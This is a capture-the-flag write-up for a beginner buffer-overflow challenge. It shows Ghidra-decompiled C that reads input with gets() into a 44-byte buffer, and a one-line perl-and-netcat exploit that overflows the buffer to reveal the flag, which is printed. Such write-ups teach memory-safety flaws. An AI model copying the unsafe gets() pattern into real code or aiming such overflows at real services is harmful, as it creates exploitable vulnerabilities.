Tags: bof pwn
Rating:
## Description
I really want to have some coffee!
```
nc chall.csivit.com 30001
```
## Analysis
Decompile with Ghidra. `main()` is very simple:
```c
undefined8 main(void)
{
char local_38 [44];
int local_c;
local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Please pour me some coffee:");
gets(local_38);
puts("\nThanks!\n");
if (local_c != 0) {
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
system("cat flag.txt");
}
return 0;
}
```
This is the "hello world" of buffer overflows. It accepts input via `gets()` into a `local_38` buffer that holds 44 chars, and immediately after that on the stack is `local_c` which just has to be non-zero to get the flag. All you have to do is enter 45 chars of input.
## Solution
```
kali@kali:~$ perl -e 'print "A"x45 . "\n"' | nc chall.csivit.com 30001
Please pour me some coffee:
Thanks!
Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
```
